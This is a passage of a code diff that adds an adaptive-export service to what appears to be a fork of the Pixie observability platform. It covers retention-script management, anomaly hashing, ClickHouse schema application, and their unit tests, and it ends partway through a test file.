actions := script.GetActions(definitions, currentScripts, script.ScriptConfig{ - ClusterName: clusterName, - ClusterId: clusterID, - CollectInterval: cfg.Worker().CollectInterval(), - }) - - var errs []error - - for _, s := range actions.ToDelete { - log.Infof("Deleting script %s", s.Name) - err := client.DeleteDataRetentionScript(s.ScriptId) - if err != nil { - errs = append(errs, err) - } + out := make([]map[string]any, len(rows)) + for i, r := range rows { + out[i] = map[string]any(r) } + return out, nil +} - for _, s := range actions.ToUpdate { - log.Infof("Updating script %s", s.Name) - err := client.UpdateDataRetentionScript(clusterID, s.ScriptId, s.Name, s.Description, s.FrequencyS, s.Script) - if err != nil { - errs = append(errs, err) +// installPresetScripts purges any stale ClickHouse-plugin retention +// scripts on the cluster, then installs the operator's built-in PxL +// scripts targeting the 12 socket_tracer tables we DDL'd. Cloud-side +// "presets" are deliberately ignored: in this fork they target legacy +// tables (conn_stats, stack_traces, dc_snoop) that aren't in the +// rev-2 schema, so installing them would just silently fail to write. +func installPresetScripts(client *pixie.Client, clusterID, clusterName string) (int, error) { + current, err := client.GetClusterScripts(clusterID, clusterName) + if err != nil { + return 0, fmt.Errorf("get cluster scripts: %w", err) + } + currentNames := make([]string, 0, len(current)) + for _, s := range current { + currentNames = append(currentNames, s.Name) + } + log.WithFields(log.Fields{ + "already_on_cluster": len(current), + "cluster_script_names": currentNames, + }).Info("preset script install — purging managed + installing built-ins") + + // Purge ONLY scripts we recognise as operator-managed or as legacy + // presets we know are broken in the rev-2 schema. User-authored + // retention scripts are left alone. + for _, s := range current { + if !isOperatorManagedScript(s.Name) { + log.WithField("script", s.Name). + Debug("preset install — leaving user-authored script alone") + continue + } + if err := client.DeleteDataRetentionScript(s.ScriptId); err != nil { + log.WithError(err).WithField("script", s.Name).Warn("failed to delete stale script") + continue } + log.WithField("script", s.Name).Info("purged stale retention script") } - for _, s := range actions.ToCreate { - log.Infof("Creating script %s", s.Name) - err := client.AddDataRetentionScript(clusterID, s.Name, s.Description, s.FrequencyS, s.Script) - if err != nil { - errs = append(errs, err) + // Install built-ins. + presets := builtinPresetScripts() + installed := 0 + for _, p := range presets { + if err := client.AddDataRetentionScript(clusterID, p.Name, p.Description, p.FrequencyS, p.Script); err != nil { + log.WithError(err).WithField("script", p.Name).Warn("failed to install built-in script") + continue } + installed++ + log.WithField("script", p.Name).Info("installed retention script") } + return installed, nil +} - if len(errs) > 0 { - return fmt.Errorf("errors while setting up data retention scripts: %v", errs) +// isOperatorManagedScript decides whether a cluster-side retention +// script is safe to delete during INSTALL_PRESET_SCRIPTS. The criteria: +// +// 1. Anything with the "ch-" prefix matches the operator's own +// builtinPresetScripts naming (ch-
) — managed. +// 2. The legacy AOCC presets we explicitly want to retire because +// their target tables don't exist in the rev-2 schema: +// "conn_stats export", "dc snoop export", "stack_traces export". +// +// Any other script is assumed user-authored and left alone. +func isOperatorManagedScript(name string) bool { + if strings.HasPrefix(name, "ch-") { + return true } - - log.Info("All done! The ClickHouse plugin is now configured.") - return nil + switch name { + case "conn_stats export", "dc snoop export", "stack_traces export": + return true + } + return false } -func setupPixie(ctx context.Context, cfg config.Pixie, tries int, sleepTime time.Duration) (*pixie.Client, error) { - apiKey := cfg.APIKey() - host := cfg.Host() - log.Infof("setupPixie: API Key length=%d, Host=%s", len(apiKey), host) - - for tries > 0 { - // Use parent context - client stores this and uses it for all subsequent operations - client, err := pixie.NewClient(ctx, apiKey, host) - if err == nil { - return client, nil - } - tries -= 1 - log.WithError(err).Warning("error creating Pixie API client") - if tries > 0 { - time.Sleep(sleepTime) - } +// builtinPresetScripts returns a minimum set of PxL scripts mirroring +// the canonical Pixie preset shape — one bulk-write script per +// socket_tracer table. Each adds namespace + pod columns and emits to +// the matching CH table via px.display(name='
') which the +// retention plugin maps to forensic_db.
. +// +// Schedule: 10s. Window: -15s (overlap so we don't lose rows during +// schedule jitter). +func builtinPresetScripts() []*script.ScriptDefinition { + // Drop dotted-name tables (http2_messages.beta, kafka_events.beta): + // `px.DataFrame(table='…')` rejects them at PxL compile time, so a + // preset for them would be permanently broken. The cloud-side + // retention plugin would have to handle those if needed. + tables := []string{ + "http_events", "dns_events", "redis_events", "mysql_events", + "pgsql_events", "cql_events", "mongodb_events", "amqp_events", + "mux_events", "tls_events", + } + out := make([]*script.ScriptDefinition, 0, len(tables)) + for _, t := range tables { + body := "import px\n" + + "df = px.DataFrame(table='" + t + "', start_time='-15s')\n" + + "df.namespace = px.upid_to_namespace(df.upid)\n" + + "df.pod = px.upid_to_pod_name(df.upid)\n" + + "px.display(df, '" + t + "')\n" + out = append(out, &script.ScriptDefinition{ + Name: "ch-" + t, + Description: "adaptive_export builtin preset for " + t, + FrequencyS: 10, + Script: body, + IsPreset: false, + }) } - return nil, fmt.Errorf("exceeded maximum number of retries") + return out } diff --git a/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel new file mode 100644 index 00000000000..01aaa0b3abf --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/BUILD.bazel @@ -0,0 +1,31 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "anomaly", + srcs = ["hash.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) + +pl_go_test( + name = "anomaly_test", + srcs = ["hash_test.go"], + embed = [":anomaly"], +) diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash.go b/src/vizier/services/adaptive_export/internal/anomaly/hash.go new file mode 100644 index 00000000000..bb819cfefe7 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/hash.go @@ -0,0 +1,69 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package anomaly defines the source-agnostic identity of one anomaly +// observation: a four-field Target and the deterministic AnomalyHash +// derived from it. +// +// AnomalyHash is the join key written by the operator into +// forensic_db.adaptive_attribution and joined against pixie observation +// tables on (hostname, namespace, pod, time_). +// +// The hash is workload-identity, NOT event-identity: it carries no +// timestamp and no rule id. The same workload firing N anomalies +// produces N kubescape rows, all collapsing to the same hash. This +// makes the hash a meaningful partition / join key. +package anomaly + +import ( + "crypto/sha256" + "encoding/hex" + "strconv" +) + +// AnomalyHash is the 32-hex-character (16-byte) join key derived from +// a Target. Same Target → same AnomalyHash, every time. +type AnomalyHash string + +// Target is the workload-identity used for hashing. Pod and Namespace +// MAY be empty (host-pid processes outside any pod). PID + Comm are +// always required by the producer; the hash function does not enforce +// that — extraction is the place to enforce. +// +// Note: timestamp and rule id deliberately not in the hash. Different +// rule firings on the same workload share the same hash; the time +// dimension is carried separately in the attribution row's +// (t_start, t_end) interval. +type Target struct { + PID uint64 + Comm string + Pod string // may be empty + Namespace string // may be empty +} + +// Hash returns the deterministic 32-hex-character AnomalyHash for the +// given Target. SHA-256 of the canonical form +// ":::", truncated to the leading 16 bytes +// (32 hex chars). 128 collision bits suffice for the workload +// cardinality envelope. +func Hash(t Target) AnomalyHash { + canonical := strconv.FormatUint(t.PID, 10) + ":" + + t.Comm + ":" + + t.Pod + ":" + + t.Namespace + sum := sha256.Sum256([]byte(canonical)) + return AnomalyHash(hex.EncodeToString(sum[:16])) +} diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go new file mode 100644 index 00000000000..dfdd8cd7d92 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go @@ -0,0 +1,110 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package anomaly + +import "testing" + +// canonical fixture: redis CVE-2025-49844 R1005 alert (workload identity only). +var canonicalTarget = Target{ + PID: 106040, + Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", + Namespace: "redis", +} + +// TestHash_Deterministic — same Target hashes identically every call. +func TestHash_Deterministic(t *testing.T) { + a := Hash(canonicalTarget) + b := Hash(canonicalTarget) + if a != b { + t.Fatalf("not deterministic: %q vs %q", a, b) + } + if got := len(a); got != 32 { + t.Fatalf("len %d, want 32 hex chars", got) + } +} + +// TestHash_DiffersOnPID — two processes on the same pod still hash differently +// (we want PER-process attribution). +func TestHash_DiffersOnPID(t *testing.T) { + other := canonicalTarget + other.PID = canonicalTarget.PID + 1 + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on PID change") + } +} + +// TestHash_DiffersOnComm — different comm under same PID/pod/ns must differ. +func TestHash_DiffersOnComm(t *testing.T) { + other := canonicalTarget + other.Comm = "redis-cli" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Comm change") + } +} + +// TestHash_DiffersOnPod — different replicas of same workload differ. +func TestHash_DiffersOnPod(t *testing.T) { + other := canonicalTarget + other.Pod = "redis-578d5dc9bd-OTHER" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Pod change") + } +} + +// TestHash_DiffersOnNamespace — same pod name in different ns must differ. +func TestHash_DiffersOnNamespace(t *testing.T) { + other := canonicalTarget + other.Namespace = "redis-staging" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Namespace change") + } +} + +// TestHash_AllowsEmptyPod — host-pid processes have no pod/namespace. +// Hash must still be computable and stable. +func TestHash_AllowsEmptyPod(t *testing.T) { + host := Target{PID: 1, Comm: "systemd"} + a := Hash(host) + b := Hash(host) + if a != b { + t.Fatalf("empty-pod hash not deterministic") + } + if len(a) != 32 { + t.Fatalf("empty-pod hash len %d", len(a)) + } + // empty-pod target must collide with itself but not with the + // non-empty-pod canonical target. + if a == Hash(canonicalTarget) { + t.Fatalf("empty-pod hash collides with named-pod hash") + } +} + +// TestHash_NoTimestampInfluence — verifies the hash function takes only +// the four identity fields. (No EventTime / RuleID parameter exists.) +// This is a structural test: the Target struct has exactly 4 fields, +// all part of the canonical form. If you add a field, you must decide +// whether it belongs in the hash and update this test. +func TestHash_NoTimestampInfluence(t *testing.T) { + // Verify the Target type has exactly 4 fields. If this fails, decide: + // new field belongs in the hash → add to canonical form; + // new field does NOT belong → leave Target unchanged, add a sibling type. + a := Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"} + if Hash(a) != Hash(Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"}) { + t.Fatalf("Target hash leaks an unrecognised field") + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel new file mode 100644 index 00000000000..e421ccc3586 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel @@ -0,0 +1,40 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "clickhouse", + srcs = [ + "apply.go", + "ddl.go", + "insert.go", + ], + embedsrcs = ["schema.sql"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) + +pl_go_test( + name = "clickhouse_test", + srcs = [ + "apply_test.go", + "ddl_test.go", + "insert_test.go", + ], + embed = [":clickhouse"], +) diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go new file mode 100644 index 00000000000..aba0b4a7ab0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go @@ -0,0 +1,232 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io" + "net/http" + "net/url" + "strings" + "time" +) + +// OperatorOwnedTables is the subset of KnownTables the adaptive_export +// operator creates on boot. Kubescape tables (alerts, kubescape_logs) +// are NOT here — they are owned by the soc/tree/clickhouse-lab +// installer. Order matters: adaptive_attribution last so it does not +// reference any pixie table during creation (it does not, but the +// invariant is cheap to keep). +var OperatorOwnedTables = []string{ + // 12 pixie socket_tracer tables — created BEFORE Pixie's retention + // plugin gets a chance to auto-DDL them (which would omit our + // namespace + pod columns and break analyst JOINs). + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + // operator's only write target. + "adaptive_attribution", +} + +// Applier applies operator-owned DDL to a ClickHouse cluster over the +// HTTP interface (default 8123). Used at boot. +type Applier struct { + endpoint string + user string + pass string + client *http.Client +} + +// NewApplier validates the endpoint and returns a ready Applier. +func NewApplier(endpoint, user, pass string) (*Applier, error) { + if endpoint == "" { + return nil, fmt.Errorf("clickhouse: empty endpoint") + } + if _, err := url.Parse(endpoint); err != nil { + return nil, fmt.Errorf("clickhouse: invalid endpoint %q: %w", endpoint, err) + } + return &Applier{ + endpoint: strings.TrimRight(endpoint, "/"), + user: user, + pass: pass, + client: &http.Client{Timeout: 30 * time.Second}, + }, nil +} + +// Apply ensures forensic_db exists, then runs CREATE TABLE IF NOT +// EXISTS for every OperatorOwnedTables entry in declared order. +// Idempotent. Returns the first error encountered without continuing — +// callers should treat schema apply as a precondition for the rest of +// boot. +func (a *Applier) Apply(ctx context.Context) error { + if err := a.execute(ctx, "CREATE DATABASE IF NOT EXISTS forensic_db"); err != nil { + return fmt.Errorf("apply: create database forensic_db: %w", err) + } + for _, table := range OperatorOwnedTables { + ddl, err := DDL(table) + if err != nil { + return fmt.Errorf("apply: get DDL for %s: %w", table, err) + } + if err := a.execute(ctx, ddl); err != nil { + return fmt.Errorf("apply: create %s: %w", table, err) + } + } + return nil +} + +// execute POSTs a single DDL statement to ClickHouse via the HTTP +// query endpoint. Non-2xx responses surface as Go errors. +func (a *Applier) execute(ctx context.Context, sql string) error { + req, err := http.NewRequestWithContext(ctx, http.MethodPost, + a.endpoint+"/", strings.NewReader(sql)) + if err != nil { + return err + } + if a.user != "" { + req.SetBasicAuth(a.user, a.pass) + } + resp, err := a.client.Do(req) + if err != nil { + return err + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + return nil +} + +// SchemaDriftError is returned by VerifyPixieSchema when a pixie +// observation table is missing one or more of the operator-required +// columns. errors.Is-friendly. +type SchemaDriftError struct { + Table string + Missing []string +} + +func (e *SchemaDriftError) Error() string { + return fmt.Sprintf("clickhouse: pixie table %q schema drift, missing columns: %s", + e.Table, strings.Join(e.Missing, ", ")) +} + +// requiredPixieColumns are the columns every pixie observation table +// MUST have for adaptive_attribution JOINs to work. namespace + pod are +// our additions over Pixie's auto-DDL; hostname + time_ are Pixie's own +// canonical columns we depend on. +var requiredPixieColumns = []string{"namespace", "pod", "hostname", "time_"} + +// VerifyPixieSchema queries system.columns for each pixie observation +// table and confirms the operator-required columns are present. Used +// as a defensive guard against Pixie's retention plugin having +// auto-created a table BEFORE our Apply ran (e.g., operator was +// installed onto a cluster where the plugin had already been running +// with its own minimal DDL). +// +// Returns the FIRST drift detected as *SchemaDriftError. Callers +// usually want to log loudly and refuse to start so the misconfig +// is visible — silently continuing leaves the table with a schema +// the analyst-side JOINs can't cope with. +func (a *Applier) VerifyPixieSchema(ctx context.Context) error { + for _, table := range PixieTables() { + cols, err := a.tableColumns(ctx, table) + if err != nil { + return fmt.Errorf("verify %s: %w", table, err) + } + var missing []string + for _, want := range requiredPixieColumns { + if !contains(cols, want) { + missing = append(missing, want) + } + } + if len(missing) > 0 { + return &SchemaDriftError{Table: table, Missing: missing} + } + } + return nil +} + +// tableColumns lists the column names of forensic_db.
as +// reported by system.columns. +func (a *Applier) tableColumns(ctx context.Context, table string) ([]string, error) { + q := url.Values{} + q.Set("query", fmt.Sprintf( + "SELECT name FROM system.columns WHERE database='forensic_db' AND table=%s FORMAT JSONEachRow", + quoteCH(table))) + req, err := http.NewRequestWithContext(ctx, http.MethodGet, a.endpoint+"/?"+q.Encode(), nil) + if err != nil { + return nil, err + } + if a.user != "" { + req.SetBasicAuth(a.user, a.pass) + } + resp, err := a.client.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + body, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + type row struct { + Name string `json:"name"` + } + var out []string + for _, line := range bytes.Split(body, []byte{'\n'}) { + line = bytes.TrimSpace(line) + if len(line) == 0 { + continue + } + var r row + if err := json.Unmarshal(line, &r); err != nil { + return nil, fmt.Errorf("parse system.columns row: %w", err) + } + out = append(out, r.Name) + } + return out, nil +} + +func quoteCH(s string) string { + r := strings.NewReplacer(`\`, `\\`, `'`, `\'`).Replace(s) + return "'" + r + "'" +} + +func contains(s []string, x string) bool { + for _, v := range s { + if v == x { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go new file mode 100644 index 00000000000..b37764ac6a4 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go @@ -0,0 +1,184 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "context" + "errors" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "testing" +) + +// TestApply_ExecutesEveryOperatorOwnedTable — Apply POSTs one DDL per +// table in OperatorOwnedTables, in order. None of the kubescape tables +// (alerts, kubescape_logs) are touched — those belong to the soc installer. +func TestApply_ExecutesEveryOperatorOwnedTable(t *testing.T) { + var mu sync.Mutex + var bodies []string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + b, _ := io.ReadAll(r.Body) + mu.Lock() + bodies = append(bodies, string(b)) + mu.Unlock() + w.WriteHeader(200) + })) + defer srv.Close() + a, err := NewApplier(srv.URL, "", "") + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + if err := a.Apply(context.Background()); err != nil { + t.Fatalf("Apply: %v", err) + } + // 1 CREATE DATABASE + len(OperatorOwnedTables) CREATE TABLE calls. + if got, want := len(bodies), len(OperatorOwnedTables)+1; got != want { + t.Fatalf("Apply made %d calls, want %d", got, want) + } + if !strings.Contains(bodies[0], "CREATE DATABASE IF NOT EXISTS forensic_db") { + t.Fatalf("first DDL must create the database; got: %s", bodies[0]) + } + // Spot-check that the SECOND call is for the first OperatorOwnedTables entry, + // and that the LAST call is for adaptive_attribution. + if !strings.Contains(bodies[1], "forensic_db."+OperatorOwnedTables[0]) { + t.Fatalf("second DDL not for %s; got: %s", OperatorOwnedTables[0], bodies[1]) + } + if !strings.Contains(bodies[len(bodies)-1], "forensic_db.adaptive_attribution") { + t.Fatalf("last DDL not for adaptive_attribution; got: %s", bodies[len(bodies)-1]) + } + // And ensure no kubescape DDL leaked through. + for _, b := range bodies { + if strings.Contains(b, "forensic_db.alerts") || strings.Contains(b, "forensic_db.kubescape_logs") { + t.Fatalf("operator's Apply must not create kubescape tables; got:\n%s", b) + } + } +} + +// TestApply_FailsFastOnHTTPError — if any CREATE returns non-2xx, +// Apply returns immediately without attempting later tables. +func TestApply_FailsFastOnHTTPError(t *testing.T) { + var calls int + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + calls++ + if calls == 1 { + w.WriteHeader(500) + _, _ = w.Write([]byte("ddl exploded")) + return + } + w.WriteHeader(200) + })) + defer srv.Close() + a, _ := NewApplier(srv.URL, "", "") + err := a.Apply(context.Background()) + if err == nil { + t.Fatalf("expected error from Apply on HTTP 500") + } + if calls != 1 { + t.Fatalf("Apply continued past first failure; calls = %d", calls) + } +} + +// TestVerifyPixieSchema_DetectsMissingColumns — defensive guard: +// if a pixie table lacks namespace or pod (because Pixie's plugin +// auto-created it before our Apply), VerifyPixieSchema returns +// SchemaDriftError naming the table and the missing columns. +func TestVerifyPixieSchema_DetectsMissingColumns(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("query") + // First pixie table → respond with FULL column list (well-formed). + // Subsequent pixie tables → respond with a column list missing namespace + pod + // (simulating Pixie's auto-DDL having created them earlier). + if strings.Contains(q, "table='http_events'") { + _, _ = w.Write([]byte(`{"name":"time_"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"upid"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"namespace"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"pod"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"hostname"}` + "\n")) + return + } + // pretend dns_events was auto-created by Pixie without our columns. + _, _ = w.Write([]byte(`{"name":"time_"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"upid"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"hostname"}` + "\n")) + })) + defer srv.Close() + a, _ := NewApplier(srv.URL, "", "") + err := a.VerifyPixieSchema(context.Background()) + if err == nil { + t.Fatalf("expected SchemaDriftError; got nil") + } + var drift *SchemaDriftError + if !errors.As(err, &drift) { + t.Fatalf("err type = %T, want *SchemaDriftError", err) + } + if drift.Table != "http2_messages.beta" { + // pixie tables iterated in PixieTables() order; first one missing should + // be http2_messages.beta (the second entry). + t.Fatalf("first drift = %q, want http2_messages.beta", drift.Table) + } + if !contains(drift.Missing, "namespace") || !contains(drift.Missing, "pod") { + t.Fatalf("Missing should include namespace + pod; got %v", drift.Missing) + } +} + +// TestVerifyPixieSchema_AllPresent — happy path: all expected columns +// present on every pixie table. +func TestVerifyPixieSchema_AllPresent(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = w.Write([]byte(`{"name":"time_"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"upid"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"namespace"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"pod"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"hostname"}` + "\n")) + })) + defer srv.Close() + a, _ := NewApplier(srv.URL, "", "") + if err := a.VerifyPixieSchema(context.Background()); err != nil { + t.Fatalf("VerifyPixieSchema: %v", err) + } +} + +// TestNewApplier_RejectsBadEndpoint — defensive contract. +func TestNewApplier_RejectsBadEndpoint(t *testing.T) { + if _, err := NewApplier("", "", ""); err == nil { + t.Fatalf("empty endpoint not rejected") + } + if _, err := NewApplier("http://%zz", "", ""); err == nil { + t.Fatalf("malformed endpoint not rejected") + } +} + +// TestOperatorOwnedTables_DoesNotIncludeKubescape — structural guard: +// the operator never owns kubescape tables. +func TestOperatorOwnedTables_DoesNotIncludeKubescape(t *testing.T) { + for _, x := range []string{"alerts", "kubescape_logs"} { + if contains(OperatorOwnedTables, x) { + t.Fatalf("%q must not be in OperatorOwnedTables (it belongs to the soc installer)", x) + } + } +} + +// TestOperatorOwnedTables_LastIsAdaptiveAttribution — ordering guard. +func TestOperatorOwnedTables_LastIsAdaptiveAttribution(t *testing.T) { + last := OperatorOwnedTables[len(OperatorOwnedTables)-1] + if last != "adaptive_attribution" { + t.Fatalf("last entry = %q, want adaptive_attribution", last) + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go new file mode 100644 index 00000000000..582c7783b7b --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go @@ -0,0 +1,117 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package clickhouse owns the canonical ClickHouse DDL for the +// forensic_db tables that adaptive_export reads (kubescape_logs) and +// the 13 socket_tracer tables Pixie's retention plugin writes (which +// the operator joins against via forensic_db.adaptive_attribution). +// +// schema.sql is the single source of truth. The operator never invents +// SQL — it always extracts statements verbatim from the embedded copy. +package clickhouse + +import ( + _ "embed" + "errors" + "fmt" + "strings" +) + +//go:embed schema.sql +var canonicalSchema string + +// KnownTables enumerates every forensic_db table the operator is aware +// of, in the order they appear in schema.sql. Backtick-quoted table +// names (those containing dots, e.g. "http2_messages.beta") are listed +// here without backticks; DDL() reinjects them. +var KnownTables = []string{ + // non-pixie + "alerts", + "kubescape_logs", + // 13 socket_tracer pixie observation tables + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + // operator-owned attribution table + "adaptive_attribution", +} + +// ErrUnknownTable is returned by DDL / Columns when asked for a table +// not in KnownTables. +var ErrUnknownTable = errors.New("clickhouse: unknown table") + +// DDL returns the canonical CREATE TABLE statement for the named table, +// extracted from the embedded schema.sql. +func DDL(table string) (string, error) { + if !isKnown(table) { + return "", fmt.Errorf("%w: %q", ErrUnknownTable, table) + } + // ClickHouse identifiers containing a dot must be backtick-quoted. + // Build the right header for the lookup. + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + header := "CREATE TABLE IF NOT EXISTS forensic_db." + identifier + start := strings.Index(canonicalSchema, header) + if start < 0 { + return "", fmt.Errorf("%w: %q registered in KnownTables but not present in embedded schema.sql", ErrUnknownTable, table) + } + rest := canonicalSchema[start:] + semi := strings.Index(rest, ";") + if semi < 0 { + return "", fmt.Errorf("malformed schema.sql: no terminating ';' after %q", table) + } + return rest[:semi+1], nil +} + +// PixieTables returns the subset of KnownTables that are pixie +// socket_tracer observation tables (the JOIN targets for +// adaptive_attribution). +func PixieTables() []string { + return []string{ + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + } +} + +func isKnown(name string) bool { + for _, t := range KnownTables { + if t == name { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go new file mode 100644 index 00000000000..c9a0e6c26fc --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go @@ -0,0 +1,142 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 